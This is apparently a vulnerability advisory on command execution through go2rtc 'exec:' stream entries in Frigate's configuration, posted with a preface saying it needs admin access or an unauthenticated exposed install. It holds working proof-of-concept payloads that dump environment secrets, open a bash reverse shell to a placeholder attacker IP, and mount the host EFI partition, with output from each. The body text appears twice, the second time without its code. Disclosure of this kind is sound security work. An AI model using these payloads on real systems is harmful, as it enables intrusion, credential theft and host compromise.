There is no indication that Frigate's built in authentication has been bypassed. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control.
1. Executive Summary
A critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc.
The Real Problem: The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive.
The Root Cause: The go2rtc service executes these commands without restrictions. Since Frigate typically requires running in privileged mode (--privileged) to access hardware acceleration, this command execution allows the attacker not only to control the container but also to directly access the host's hardware and file system, breaking security isolation (Container Escape).
2. Technical Details
The application allows the editing of the config.yaml file, which is processed by the integrated go2rtc service. By defining a stream using the exec: prefix, go2rtc directly executes the specified binary.
Due to the standard privileged configuration, the process inherits extended capabilities (CAP_SYS_ADMIN), allowing it to mount physical disks and modify the host system boot.
3. Proof of Concept (PoC)
To successfully trigger the vulnerability, simply defining the stream is not enough; the stream must be active. This requires configuring a dummy camera to consume the malicious stream and performing a service restart via the UI.
3.1. Trigger Mechanism
The following configuration demonstrates how to link a fake camera to the malicious stream to force execution upon service restart.
Required Configuration Pattern:
cameras:
poc_cam:
enabled: true
ffmpeg:
inputs:
- path: rtsp://127.0.0.1:8554/malicious_stream
roles:
- detect
detect:
enabled: false
audio:
enabled: false
go2rtc:
streams:
malicious_stream:
- "exec:[PAYLOAD_COMMAND_HERE]"After saving this configuration, a restart via the UI is required to trigger the execution.
3.2. Demonstrated Payloads
The following payloads were tested using the trigger mechanism described above.
PoC 1: Secrets and Environment Variable Exfiltration
Description: The attacker dumps the process environment to obtain credentials.
Payload:
go2rtc:
streams:
poc_env:
- "exec:/bin/bash -c 'env > /config/evidence_secrets.txt; sleep 30'"Evidence (cat /config/evidence_secrets.txt):
NVIDIA_VISIBLE_DEVICES=<REDACTED>
NVIDIA_DRIVER_CAPABILITIES=compute,utility,video
FRIGATE_RTSP_USER_CAM1=<REDACTED>
FRIGATE_RTSP_PASS_CAM1=<REDACTED>
FRIGATE_RTSP_USER_CAM2=<REDACTED>
FRIGATE_RTSP_PASS_CAM2=<REDACTED>
FRIGATE_OPENAI_API_KEY=<REDACTED>
DEFAULT_FFMPEG_VERSION=7.0
LIBAVFORMAT_VERSION_MAJOR=61
INCLUDED_FFMPEG_VERSIONS=7.0:5.0
HOSTNAME=102a3a185d16
HOME=/root
PWD=/run/s6-rc:s6-rc-init:fIPglo/servicedirs/go2rtc
PATH=/command:/usr/local/go2rtc/bin:/usr/local/tempio/bin:/usr/local/nginx/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PoC 2: Interactive Reverse Shell (Remote Control)
Description: A remote connection is established for interactive control.
Payload:
go2rtc:
streams:
poc_rev_shell:
- "exec:/bin/bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'"Evidence (Attacker Terminal):
ubuntu@ubuntu:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.30 53156
bash: cannot set terminal process group (127): Inappropriate ioctl for device
bash: no job control in this shell
root@102a3a185d16:/run/s6-rc:s6-rc-init:fIPglo/servicedirs/go2rtc# id
uid=0(root) gid=0(root) groups=0(root)
PoC 3: Container Escape and Host Compromise
Description: The attacker mounts the physical host EFI partition inside the container, demonstrating total hardware control.
Payload:
go2rtc:
streams:
poc_escape:
- "exec:/bin/bash -c 'mkdir -p /tmp/host_efi; mount /dev/nvme0n1p1 /tmp/host_efi; ls -R /tmp/host_efi > /config/evidence_host_efi.txt; sleep 60'"Evidence (cat /config/evidence_host_efi.txt):
/tmp/host_efi:
EFI
/tmp/host_efi/EFI:
BOOT
ubuntu
/tmp/host_efi/EFI/BOOT:
BOOTX64.EFI
fbx64.efi
mmx64.efi
/tmp/host_efi/EFI/ubuntu:
BOOTX64.CSV
grub.cfg
grubx64.efi
mmx64.efi
shimx64.efi
4. Impact
Financial Impact: Exposure of payment API keys and external services.
Privacy Violation: Unauthorized access to video feeds and RTSP credentials.
Total Compromise: In privileged deployments, complete control of the physical host with the possibility of boot-level persistence.
jduardo2704 Reporter
There is no indication that Frigate's built in authentication has been bypassed. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control.
1. Executive Summary
A critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc.
The Real Problem: The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive.
The Root Cause: The go2rtc service executes these commands without restrictions. Since Frigate typically requires running in privileged mode (--privileged) to access hardware acceleration, this command execution allows the attacker not only to control the container but also to directly access the host's hardware and file system, breaking security isolation (Container Escape).
2. Technical Details
The application allows the editing of the config.yaml file, which is processed by the integrated go2rtc service. By defining a stream using the exec: prefix, go2rtc directly executes the specified binary.
Due to the standard privileged configuration, the process inherits extended capabilities (CAP_SYS_ADMIN), allowing it to mount physical disks and modify the host system boot.
3. Proof of Concept (PoC)
To successfully trigger the vulnerability, simply defining the stream is not enough; the stream must be active. This requires configuring a dummy camera to consume the malicious stream and performing a service restart via the UI.
3.1. Trigger Mechanism
The following configuration demonstrates how to link a fake camera to the malicious stream to force execution upon service restart.
Required Configuration Pattern:
After saving this configuration, a restart via the UI is required to trigger the execution.
3.2. Demonstrated Payloads
The following payloads were tested using the trigger mechanism described above.
PoC 1: Secrets and Environment Variable Exfiltration
Description: The attacker dumps the process environment to obtain credentials.
Payload:
Evidence (cat /config/evidence_secrets.txt):
PoC 2: Interactive Reverse Shell (Remote Control)
Description: A remote connection is established for interactive control.
Payload:
Evidence (Attacker Terminal):
PoC 3: Container Escape and Host Compromise
Description: The attacker mounts the physical host EFI partition inside the container, demonstrating total hardware control.
Payload:
Evidence (cat /config/evidence_host_efi.txt):
4. Impact
Financial Impact: Exposure of payment API keys and external services.
Privacy Violation: Unauthorized access to video feeds and RTSP credentials.
Total Compromise: In privileged deployments, complete control of the physical host with the possibility of boot-level persistence.